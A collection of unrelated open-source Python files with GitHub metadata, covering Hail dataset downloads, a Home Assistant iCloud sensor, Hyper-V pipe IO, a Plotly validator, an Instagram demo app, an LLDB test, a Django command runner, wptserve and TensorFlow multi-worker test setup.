hl.hadoop_copy(local_path_uri(tmp_sample_annot), sample_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_gene_annot), gene_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_vcf), vcf_path)
info('Done!')
else:
info('HGDP files found')
def get_movie_lens(output_dir, overwrite: bool = False):
"""Download public Movie Lens dataset.
Notes
-----
The download is about 6M.
See the
`MovieLens website <https://grouplens.org/datasets/movielens/100k/>`__
for more information about this dataset.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite existing files/directories at those locations.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
paths = [os.path.join(output_dir, x) for x in ['movies.ht', 'ratings.ht', 'users.ht']]
if overwrite or any(not _dir_exists(fs, f) for f in paths):
init_temp_dir()
source = resources['movie_lens_100k']
tmp_path = os.path.join(tmp_dir, 'ml-100k.zip')
info(f'downloading MovieLens-100k data ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_path)
with zipfile.ZipFile(tmp_path, 'r') as z:
z.extractall(tmp_dir)
user_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.user')
movie_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.item')
ratings_table_path = os.path.join(tmp_dir, 'ml-100k', 'u.data')
assert (os.path.exists(user_table_path))
assert (os.path.exists(movie_table_path))
assert (os.path.exists(ratings_table_path))
user_cluster_readable = _copy_to_tmp(fs, local_path_uri(user_table_path), extension='txt')
movie_cluster_readable = _copy_to_tmp(fs, local_path_uri(movie_table_path), 'txt')
ratings_cluster_readable = _copy_to_tmp(fs, local_path_uri(ratings_table_path), 'txt')
[movies_path, ratings_path, users_path] = paths
genres = ['Action', 'Adventure', 'Animation',
"Children's", 'Comedy', 'Crime',
'Documentary', 'Drama', 'Fantasy',
'Film-Noir', 'Horror', 'Musical',
'Mystery', 'Romance', 'Sci-Fi',
'Thriller', 'War', 'Western']
# utility functions for importing movies
def field_to_array(ds, field):
return hl.if_else(ds[field] != 0, hl.array([field]), hl.empty_array(hl.tstr))
def fields_to_array(ds, fields):
return hl.flatten(hl.array([field_to_array(ds, f) for f in fields]))
def rename_columns(ht, new_names):
return ht.rename({k: v for k, v in zip(ht.row, new_names)})
info(f'importing users table and writing to {users_path} ...')
users = rename_columns(
hl.import_table(user_cluster_readable, key=['f0'], no_header=True, impute=True, delimiter='|'),
['id', 'age', 'sex', 'occupation', 'zipcode'])
users.write(users_path, overwrite=True)
info(f'importing movies table and writing to {movies_path} ...')
movies = hl.import_table(movie_cluster_readable, key=['f0'], no_header=True, impute=True, delimiter='|')
movies = rename_columns(movies,
['id', 'title', 'release date', 'video release date', 'IMDb URL', 'unknown'] + genres)
movies = movies.drop('release date', 'video release date', 'unknown', 'IMDb URL')
movies = movies.transmute(genres=fields_to_array(movies, genres))
movies.write(movies_path, overwrite=True)
info(f'importing ratings table and writing to {ratings_path} ...')
ratings = hl.import_table(ratings_cluster_readable, no_header=True, impute=True)
ratings = rename_columns(ratings,
['user_id', 'movie_id', 'rating', 'timestamp'])
ratings = ratings.drop('timestamp')
ratings.write(ratings_path, overwrite=True)
else:
info('Movie Lens files found!')
|
{
"content_hash": "070a012e3617d3923824da7e2c53adaf",
"timestamp": "",
"source": "github",
"line_count": 258,
"max_line_length": 130,
"avg_line_length": 39.674418604651166,
"alnum_prop": 0.6285658460336069,
"repo_name": "hail-is/hail",
"id": "9bf58d18f3c93dd4af22b5faae1cc904cdde2f0c",
"size": "10236",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "hail/python/hail/utils/tutorial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7729"
},
{
"name": "C",
"bytes": "779"
},
{
"name": "C++",
"bytes": "171899"
},
{
"name": "CMake",
"bytes": "3045"
},
{
"name": "CSS",
"bytes": "666"
},
{
"name": "Dockerfile",
"bytes": "10056"
},
{
"name": "Emacs Lisp",
"bytes": "377"
},
{
"name": "HCL",
"bytes": "54923"
},
{
"name": "HTML",
"bytes": "155946"
},
{
"name": "Java",
"bytes": "38401"
},
{
"name": "JavaScript",
"bytes": "877"
},
{
"name": "Jupyter Notebook",
"bytes": "305748"
},
{
"name": "MLIR",
"bytes": "20"
},
{
"name": "Makefile",
"bytes": "61284"
},
{
"name": "Python",
"bytes": "5635857"
},
{
"name": "R",
"bytes": "3038"
},
{
"name": "SCSS",
"bytes": "33487"
},
{
"name": "Scala",
"bytes": "5050997"
},
{
"name": "Shell",
"bytes": "75539"
},
{
"name": "XSLT",
"bytes": "5748"
}
],
"symlink_target": ""
}
|
"""Support for iCloud sensors."""
from __future__ import annotations
from typing import Any
from homeassistant.components.sensor import SensorDeviceClass, SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.icon import icon_for_battery_level
from .account import IcloudAccount, IcloudDevice
from .const import DOMAIN
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up device tracker for iCloud component."""
account = hass.data[DOMAIN][entry.unique_id]
tracked = set()
@callback
def update_account():
"""Update the values of the account."""
add_entities(account, async_add_entities, tracked)
account.listeners.append(
async_dispatcher_connect(hass, account.signal_device_new, update_account)
)
update_account()
@callback
def add_entities(account, async_add_entities, tracked):
"""Add new tracker entities from the account."""
new_tracked = []
for dev_id, device in account.devices.items():
if dev_id in tracked or device.battery_level is None:
continue
new_tracked.append(IcloudDeviceBatterySensor(account, device))
tracked.add(dev_id)
if new_tracked:
async_add_entities(new_tracked, True)
class IcloudDeviceBatterySensor(SensorEntity):
"""Representation of a iCloud device battery sensor."""
_attr_device_class = SensorDeviceClass.BATTERY
_attr_native_unit_of_measurement = PERCENTAGE
def __init__(self, account: IcloudAccount, device: IcloudDevice) -> None:
"""Initialize the battery sensor."""
self._account = account
self._device = device
self._unsub_dispatcher = None
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return f"{self._device.unique_id}_battery"
@property
def name(self) -> str:
"""Sensor name."""
return f"{self._device.name} battery state"
@property
def native_value(self) -> int:
"""Battery state percentage."""
return self._device.battery_level
@property
def icon(self) -> str:
"""Battery state icon handling."""
return icon_for_battery_level(
battery_level=self._device.battery_level,
charging=self._device.battery_status == "Charging",
)
@property
def extra_state_attributes(self) -> dict[str, Any]:
"""Return default attributes for the iCloud device entity."""
return self._device.extra_state_attributes
@property
def device_info(self) -> DeviceInfo:
"""Return the device information."""
return DeviceInfo(
configuration_url="https://icloud.com/",
identifiers={(DOMAIN, self._device.unique_id)},
manufacturer="Apple",
model=self._device.device_model,
name=self._device.name,
)
@property
def should_poll(self) -> bool:
"""No polling needed."""
return False
async def async_added_to_hass(self):
"""Register state update callback."""
self._unsub_dispatcher = async_dispatcher_connect(
self.hass, self._account.signal_device_update, self.async_write_ha_state
)
async def async_will_remove_from_hass(self):
"""Clean up after entity before removal."""
self._unsub_dispatcher()
|
{
"content_hash": "820f4366fc752e3f2579922f0588fad8",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 84,
"avg_line_length": 31.23076923076923,
"alnum_prop": 0.6603721948549535,
"repo_name": "home-assistant/home-assistant",
"id": "bf5ff5860e3b6d9d01d8296aa8e86caa494a443e",
"size": "3654",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/icloud/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
import ctypes
import struct
import sys
from eventlet import patcher
from nova.i18n import _
from oslo_log import log as logging
from oslo_utils import units
from hyperv.nova import constants
from hyperv.nova import vmutils
LOG = logging.getLogger(__name__)
Queue = patcher.original('Queue')
if sys.platform == 'win32':
from ctypes import wintypes
kernel32 = ctypes.windll.kernel32
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', wintypes.ULONG),
('InternalHigh', wintypes.ULONG),
('Offset', wintypes.DWORD),
('OffsetHigh', wintypes.DWORD),
('hEvent', wintypes.HANDLE)
]
def __init__(self):
self.Offset = 0
self.OffsetHigh = 0
LPOVERLAPPED = ctypes.POINTER(OVERLAPPED)
LPOVERLAPPED_COMPLETION_ROUTINE = ctypes.WINFUNCTYPE(
None, wintypes.DWORD, wintypes.DWORD, LPOVERLAPPED)
kernel32.ReadFileEx.argtypes = [
wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
LPOVERLAPPED, LPOVERLAPPED_COMPLETION_ROUTINE]
kernel32.WriteFileEx.argtypes = [
wintypes.HANDLE, wintypes.LPCVOID, wintypes.DWORD,
LPOVERLAPPED, LPOVERLAPPED_COMPLETION_ROUTINE]
FILE_FLAG_OVERLAPPED = 0x40000000
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
INVALID_HANDLE_VALUE = -1
WAIT_FAILED = 0xFFFFFFFF
WAIT_FINISHED = 0
ERROR_PIPE_BUSY = 231
ERROR_PIPE_NOT_CONNECTED = 233
ERROR_NOT_FOUND = 1168
WAIT_PIPE_DEFAULT_TIMEOUT = 5 # seconds
WAIT_IO_COMPLETION_TIMEOUT = 2 * units.k
WAIT_INFINITE_TIMEOUT = 0xFFFFFFFF
IO_QUEUE_TIMEOUT = 2
IO_QUEUE_BURST_TIMEOUT = 0.05
class HyperVIOError(vmutils.HyperVException):
msg_fmt = _("IO operation failed while executing "
"Win32 API function %(func_name)s. "
"Error code: %(error_code)s. "
"Error message %(error_message)s.")
def __init__(self, error_code=None, error_message=None,
func_name=None):
self.error_code = error_code
message = self.msg_fmt % {'func_name': func_name,
'error_code': error_code,
'error_message': error_message}
super(HyperVIOError, self).__init__(message)
class IOUtils(object):
"""Asyncronous IO helper class."""
def _run_and_check_output(self, func, *args, **kwargs):
"""Convenience helper method for running Win32 API methods."""
# A list of return values signaling that the operation failed.
error_codes = kwargs.pop('error_codes', [0])
ignored_error_codes = kwargs.pop('ignored_error_codes', None)
ret_val = func(*args, **kwargs)
if ret_val in error_codes:
func_name = func.__name__
self.handle_last_error(func_name=func_name,
ignored_error_codes=ignored_error_codes)
return ret_val
def handle_last_error(self, func_name=None, ignored_error_codes=None):
error_code = kernel32.GetLastError()
kernel32.SetLastError(0)
if ignored_error_codes and error_code in ignored_error_codes:
return
message_buffer = ctypes.c_char_p()
kernel32.FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
None, error_code, 0, ctypes.byref(message_buffer), 0, None)
error_message = message_buffer.value
kernel32.LocalFree(message_buffer)
raise HyperVIOError(error_code=error_code,
error_message=error_message,
func_name=func_name)
def wait_named_pipe(self, pipe_name, timeout=WAIT_PIPE_DEFAULT_TIMEOUT):
"""Wait a given ammount of time for a pipe to become available."""
self._run_and_check_output(kernel32.WaitNamedPipeW,
ctypes.c_wchar_p(pipe_name),
timeout * units.k)
def open(self, path, desired_access=None, share_mode=None,
creation_disposition=None, flags_and_attributes=None):
error_codes = [INVALID_HANDLE_VALUE]
handle = self._run_and_check_output(kernel32.CreateFileW,
ctypes.c_wchar_p(path),
desired_access,
share_mode,
None,
creation_disposition,
flags_and_attributes,
None,
error_codes=error_codes)
return handle
def cancel_io(self, handle, overlapped_structure=None):
"""Cancels pending IO on specified handle."""
# Ignore errors thrown when there are no requests
# to be canceled.
ignored_error_codes = [ERROR_NOT_FOUND]
self._run_and_check_output(kernel32.CancelIoEx,
handle,
overlapped_structure,
ignored_error_codes=ignored_error_codes)
def close_handle(self, handle):
self._run_and_check_output(kernel32.CloseHandle, handle)
def _wait_io_completion(self, event):
self._run_and_check_output(kernel32.WaitForSingleObjectEx,
event, WAIT_INFINITE_TIMEOUT,
True, error_codes=[WAIT_FAILED])
def set_event(self, event):
self._run_and_check_output(kernel32.SetEvent, event)
def _reset_event(self, event):
self._run_and_check_output(kernel32.ResetEvent, event)
def _create_event(self, event_attributes=None, manual_reset=True,
initial_state=False, name=None):
return self._run_and_check_output(kernel32.CreateEventW,
event_attributes, manual_reset,
initial_state, name,
error_codes=[None])
def get_completion_routine(self, callback=None):
def _completion_routine(error_code, num_bytes, lpOverLapped):
"""Sets the completion event and executes callback, if passed."""
overlapped = ctypes.cast(lpOverLapped, LPOVERLAPPED).contents
self.set_event(overlapped.hEvent)
if callback:
callback(num_bytes)
return LPOVERLAPPED_COMPLETION_ROUTINE(_completion_routine)
def get_new_overlapped_structure(self):
"""Structure used for asyncronous IO operations."""
# Event used for signaling IO completion
hEvent = self._create_event()
overlapped_structure = OVERLAPPED()
overlapped_structure.hEvent = hEvent
return overlapped_structure
def read(self, handle, buff, num_bytes,
overlapped_structure, completion_routine):
self._reset_event(overlapped_structure.hEvent)
self._run_and_check_output(kernel32.ReadFileEx,
handle, buff, num_bytes,
ctypes.byref(overlapped_structure),
completion_routine)
self._wait_io_completion(overlapped_structure.hEvent)
def write(self, handle, buff, num_bytes,
overlapped_structure, completion_routine):
self._reset_event(overlapped_structure.hEvent)
self._run_and_check_output(kernel32.WriteFileEx,
handle, buff, num_bytes,
ctypes.byref(overlapped_structure),
completion_routine)
self._wait_io_completion(overlapped_structure.hEvent)
def get_buffer(self, buff_size):
return (ctypes.c_ubyte * buff_size)()
def get_buffer_data(self, buff, num_bytes):
data = "".join([struct.pack('B', b)
for b in buff[:num_bytes]])
return data
def write_buffer_data(self, buff, data):
for i, c in enumerate(data):
buff[i] = struct.unpack('B', c)[0]
class IOQueue(Queue.Queue):
def __init__(self, client_connected):
Queue.Queue.__init__(self)
self._client_connected = client_connected
def get(self, timeout=IO_QUEUE_TIMEOUT, continue_on_timeout=True):
while self._client_connected.isSet():
try:
return Queue.Queue.get(self, timeout=timeout)
except Queue.Empty:
if continue_on_timeout:
continue
else:
break
def put(self, item, timeout=IO_QUEUE_TIMEOUT):
while self._client_connected.isSet():
try:
return Queue.Queue.put(self, item, timeout=timeout)
except Queue.Full:
continue
def get_burst(self, timeout=IO_QUEUE_TIMEOUT,
burst_timeout=IO_QUEUE_BURST_TIMEOUT,
max_size=constants.SERIAL_CONSOLE_BUFFER_SIZE):
# Get as much data as possible from the queue
# to avoid sending small chunks.
data = self.get(timeout=timeout)
while data and not (len(data) > max_size):
chunk = self.get(timeout=burst_timeout,
continue_on_timeout=False)
if chunk:
data += chunk
else:
break
return data
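# Illustrative usage sketch: how the IOUtils helpers above can be combined
# for a single overlapped read on a named pipe. The pipe path and buffer
# size are only examples.
#
#   ioutils = IOUtils()
#   ioutils.wait_named_pipe(r'\\.\pipe\example-pipe')
#   handle = ioutils.open(r'\\.\pipe\example-pipe',
#                         desired_access=(GENERIC_READ | GENERIC_WRITE),
#                         share_mode=(FILE_SHARE_READ | FILE_SHARE_WRITE),
#                         creation_disposition=OPEN_EXISTING,
#                         flags_and_attributes=FILE_FLAG_OVERLAPPED)
#   buff = ioutils.get_buffer(1024)
#   overlapped = ioutils.get_new_overlapped_structure()
#   completion_routine = ioutils.get_completion_routine()
#   ioutils.read(handle, buff, 1024, overlapped, completion_routine)
#   data = ioutils.get_buffer_data(buff, 1024)
#   ioutils.close_handle(handle)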
|
{
"content_hash": "d2bccf54e28e649a5eac7b2c80b820aa",
"timestamp": "",
"source": "github",
"line_count": 263,
"max_line_length": 77,
"avg_line_length": 37.08365019011407,
"alnum_prop": 0.575207628422024,
"repo_name": "adelina-t/compute-hyperv",
"id": "bde10254e578afe2e2fefc18d61ef5eee8fdb015",
"size": "10392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hyperv/nova/ioutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "685121"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class ExponentformatValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name="exponentformat",
parent_name="barpolar.marker.colorbar",
**kwargs,
):
super(ExponentformatValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
values=kwargs.pop("values", ["none", "e", "E", "power", "SI", "B"]),
**kwargs,
)
|
{
"content_hash": "4ab1a2d64665df0c20531bae489d26ff",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 80,
"avg_line_length": 33.1764705882353,
"alnum_prop": 0.5797872340425532,
"repo_name": "plotly/plotly.py",
"id": "ded52c3fb65e7be5741f07d1be33a55e8129dbc5",
"size": "564",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/barpolar/marker/colorbar/_exponentformat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
import bottle
from os import environ
from bottle import route, post, run, request, view
from instagram import client, subscriptions
bottle.debug(True)
CONFIG = {
'client_id': '27e229137db647e7a4af91f1d1ba6105',
'client_secret': 'f8900228cca14a72a41fbd2a02d9f0f8',
'redirect_uri': 'http://instacerberus.herokuapp.com/oauth_callback'
}
unauthenticated_api = client.InstagramAPI(**CONFIG)
def process_tag_update(update):
print update
reactor = subscriptions.SubscriptionsReactor()
reactor.register_callback(subscriptions.SubscriptionType.TAG, process_tag_update)
@route('/test')
@view('index')
def test():
return dict()
@route('/')
def home():
try:
url = unauthenticated_api.get_authorize_url(scope=["likes" , "comments"])
return '<a href="%s">Connect with Instagram</a>' % url
except Exception, e:
print e
@route('/oauth_callback')
@view('index')
def on_callback():
code = request.GET.get("code")
if not code:
return 'Missing code'
try:
access_token = unauthenticated_api.exchange_code_for_access_token(code)
if not access_token:
return 'Could not get access token'
api = client.InstagramAPI(access_token=access_token[0])
tag = api.tag(tag_name='piccollage')
return dict(count=tag.media_count, token=access_token[0])
except Exception, e:
print e
@route('/realtime_callback')
@post('/realtime_callback')
def on_realtime_callback():
mode = request.GET.get("hub.mode")
challenge = request.GET.get("hub.challenge")
verify_token = request.GET.get("hub.verify_token")
if challenge:
return challenge
else:
x_hub_signature = request.header.get('X-Hub-Signature')
raw_response = request.body.read()
try:
reactor.process(CONFIG['client_secret'], raw_response, x_hub_signature)
except subscriptions.SubscriptionVerifyError:
print "Signature mismatch"
run(host='0.0.0.0', port=int(environ.get("PORT", 5000)), reloader=True)
|
{
"content_hash": "ace7600941794dab99f93e28e923c4e6",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 83,
"avg_line_length": 30.46268656716418,
"alnum_prop": 0.6731994120529152,
"repo_name": "bearprada/instagram-tag-monitor",
"id": "908493c66b6323abf9162be8f002f106d5fb9338",
"size": "2041",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39894"
}
],
"symlink_target": ""
}
|
"""
Test lldb data formatter subsystem.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class SyntheticFilterRecomputingTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break at.
self.line = line_number('main.m', '// Set break point at this line.')
@skipUnlessDarwin
def test_rdar12437442_with_run_command(self):
"""Test that we update SBValues correctly as dynamic types change."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# This is the function to remove the custom formats in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('type format clear', check=False)
self.runCmd('type summary clear', check=False)
self.runCmd('type synth clear', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
# Now run the bulk of the test
id_x = self.dbg.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame().FindVariable("x")
id_x.SetPreferDynamicValue(lldb.eDynamicCanRunTarget)
id_x.SetPreferSyntheticValue(True)
if self.TraceOn():
self.runCmd("expr --dynamic-type run-target --ptr-depth 1 -- x")
self.assertTrue(
id_x.GetSummary() == '@"5 elements"',
"array does not get correct summary")
self.runCmd("next")
self.runCmd("frame select 0")
id_x = self.dbg.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame().FindVariable("x")
id_x.SetPreferDynamicValue(lldb.eDynamicCanRunTarget)
id_x.SetPreferSyntheticValue(True)
if self.TraceOn():
self.runCmd("expr --dynamic-type run-target --ptr-depth 1 -- x")
self.assertTrue(
id_x.GetNumChildren() == 7,
"dictionary does not have 7 children")
id_x.SetPreferSyntheticValue(False)
self.assertFalse(
id_x.GetNumChildren() == 7,
"dictionary still looks synthetic")
id_x.SetPreferSyntheticValue(True)
self.assertTrue(
id_x.GetSummary() == "7 key/value pairs",
"dictionary does not get correct summary")
|
{
"content_hash": "9862d6004c4d530ee85cddc8bd367f7f",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 85,
"avg_line_length": 35.10843373493976,
"alnum_prop": 0.6228551818805765,
"repo_name": "endlessm/chromium-browser",
"id": "e9e570eda5862791717147317f07cda2f2df2e6a",
"size": "2914",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "third_party/llvm/lldb/test/API/functionalities/data-formatter/synthupdate/TestSyntheticFilterRecompute.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from django.core.management import find_management_module, find_commands, load_command_class
from django.core.management.base import handle_default_options
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponsePermanentRedirect, HttpResponseRedirect
from django.template import Context, loader, RequestContext
from forms import CommandArgsForm
import StringIO
from management.decorators import redirect_stderr_stdout
import sys
from utils import on_production_server
from django.http import Http404
from django.core.urlresolvers import reverse
from django.utils.functional import wraps
# Some commands have to be excluded because they either cannot be implemented here or do not make sense in this context (e.g. runserver).
EXCLUDED_COMMANDS = ['runserver','deploy','remote','dbshell','startapp','startproject','compilemessages','runfcgi','shell','makemessages']
OVERWRITE_COMMANDS = ['django.contrib.auth:changepassword',]
def only_admin(view):
@wraps(view)
def inner(*args, **kwargs):
if on_production_server:
from google.appengine.api import users
if not users.get_current_user():
return HttpResponseRedirect(users.create_login_url(reverse("commands")))
else:
if users.is_current_user_admin():
return view(*args, **kwargs)
raise Http404("User is not admin")
else:
return view(*args, **kwargs)
return inner
@only_admin
def commands(request):
template = loader.get_template('djangoappengine_rdbms/commands.html')
_commands = {}
#import debugger; debugger.pdb().set_trace()
for app_name in settings.INSTALLED_APPS + ["django.core"]:
try:
command_names = find_commands(find_management_module(app_name))
for command_name in command_names:
if command_name not in EXCLUDED_COMMANDS:
if "%s:%s" % (app_name, command_name) not in OVERWRITE_COMMANDS:
_commands[command_name] = {'command_name':command_name,'app_name':app_name}
except ImportError:
pass
#import debugger; debugger.pdb().set_trace()
_commands = _commands.values()
_commands.sort(key=lambda x: x['command_name'])
context = {'commands':_commands}
return HttpResponse(template.render(RequestContext(request,context)))
@only_admin
def command_details(request, app_name, command_name):
command = load_command_class(app_name, command_name)
template = loader.get_template('djangoappengine_rdbms/command_details.html')
#
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
@redirect_stderr_stdout(stdout=stdout,stderr=stderr)
def _execute_command(command, command_name, stdout, stderr, argv):
parser = command.create_parser("manage.py", command_name)
options, argss = parser.parse_args(argv.split())
handle_default_options(options)
options.__dict__["stdout"] = stdout
options.__dict__["stderr"] = stderr
options.__dict__['interactive'] = False
#import debugger; debugger.pdb().set_trace()
try:
return command.execute(*argss, **options.__dict__)
except SystemExit, e:
pass
except Exception, e:
            stderr.write(str(e))
if request.POST:
form = CommandArgsForm(request.POST, command=command)
if form.is_valid():
ret = _execute_command(command, command_name, stdout=stdout, stderr=stderr, argv = form.cleaned_data.get("args"))
else:
form = CommandArgsForm(command=command)
stdout.seek(0)
stderr.seek(0)
#import debugger; debugger.pdb().set_trace()
context = { 'command':command,
'command_name':command_name,
'app_name':app_name,
'form':form,
'stdout':stdout.read(),
'stderr':stderr.read(),
}
return HttpResponse(template.render(RequestContext(request,context)))
|
{
"content_hash": "5ea6a9748283474b4c327e07f1800180",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 138,
"avg_line_length": 34.63559322033898,
"alnum_prop": 0.6459505749938831,
"repo_name": "danpetrikin/djangoappengine_rdbms",
"id": "b482bddeaaa337b75a297b9069c669735f41f97b",
"size": "4087",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "75958"
}
],
"symlink_target": ""
}
|
class NoSSLEnvironment:
ssl_enabled = False
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
pass
def host_cert_path(self, hosts):
return None, None
def ca_cert_path(self, hosts):
return None
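# Illustrative usage sketch: NoSSLEnvironment is a no-op stand-in used when
# TLS is disabled, so the calls below simply return empty values.
#
#   with NoSSLEnvironment() as env:
#       key_path, cert_path = env.host_cert_path(['localhost'])  # (None, None)
#       ca_path = env.ca_cert_path(['localhost'])                # None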
|
{
"content_hash": "9f1c91ffdec6a18bf53f154fa7d267f8",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 40,
"avg_line_length": 19.058823529411764,
"alnum_prop": 0.5493827160493827,
"repo_name": "chromium/chromium",
"id": "d5f913735a5dd073ea40c6153dde8a29e9e1ca51",
"size": "352",
"binary": false,
"copies": "13",
"ref": "refs/heads/main",
"path": "third_party/wpt_tools/wpt/tools/wptserve/wptserve/sslutils/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Base testing class for strategies that require multiple nodes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import threading
import numpy as np
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.estimator import run_config
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
ASSIGNED_PORTS = set()
lock = threading.Lock()
def pick_unused_port():
"""Returns an unused and unassigned local port."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
global ASSIGNED_PORTS
with lock:
while True:
port = portpicker.pick_unused_port()
if port > 10000 and port not in ASSIGNED_PORTS:
ASSIGNED_PORTS.add(port)
logging.info('Using local port %r', port)
return port
def _create_cluster(num_workers,
num_ps,
has_chief=False,
has_eval=False,
protocol='grpc',
worker_config=None,
ps_config=None):
"""Creates and starts local servers and returns the cluster_spec dict."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [pick_unused_port() for _ in range(num_workers)]
ps_ports = [pick_unused_port() for _ in range(num_ps)]
cluster_dict = {}
if num_workers > 0:
cluster_dict['worker'] = ['localhost:%s' % port for port in worker_ports]
if num_ps > 0:
cluster_dict['ps'] = ['localhost:%s' % port for port in ps_ports]
if has_eval:
cluster_dict['evaluator'] = ['localhost:%s' % pick_unused_port()]
if has_chief:
cluster_dict['chief'] = ['localhost:%s' % pick_unused_port()]
cs = server_lib.ClusterSpec(cluster_dict)
for i in range(num_workers):
server_lib.Server(
cs,
job_name='worker',
protocol=protocol,
task_index=i,
config=worker_config,
start=True)
for i in range(num_ps):
server_lib.Server(
cs,
job_name='ps',
protocol=protocol,
task_index=i,
config=ps_config,
start=True)
if has_chief:
server_lib.Server(
cs,
job_name='chief',
protocol=protocol,
task_index=0,
config=worker_config,
start=True)
if has_eval:
server_lib.Server(
cs,
job_name='evaluator',
protocol=protocol,
task_index=0,
config=worker_config,
start=True)
return cluster_dict
def create_in_process_cluster(num_workers,
num_ps,
has_chief=False,
has_eval=False):
"""Create an in-process cluster that consists of only standard server."""
# Leave some memory for cuda runtime.
gpu_mem_frac = 0.7 / (num_workers + int(has_chief) + int(has_eval))
worker_config = config_pb2.ConfigProto()
worker_config.gpu_options.per_process_gpu_memory_fraction = gpu_mem_frac
# Enable collective ops which has no impact on non-collective ops.
# TODO(yuefengz, tucker): removing this after we move the initialization of
# collective mgr to the session level.
if has_chief:
worker_config.experimental.collective_group_leader = (
'/job:chief/replica:0/task:0')
else:
worker_config.experimental.collective_group_leader = (
'/job:worker/replica:0/task:0')
ps_config = config_pb2.ConfigProto()
ps_config.device_count['GPU'] = 0
# Create in-process servers. Once an in-process tensorflow server is created,
# there is no way to terminate it. So we create one cluster per test process.
  # We could have started the server in another process and then killed that
  # process to terminate the server. The reasons why we don't want multiple
# processes are
# 1) it is more difficult to manage these processes;
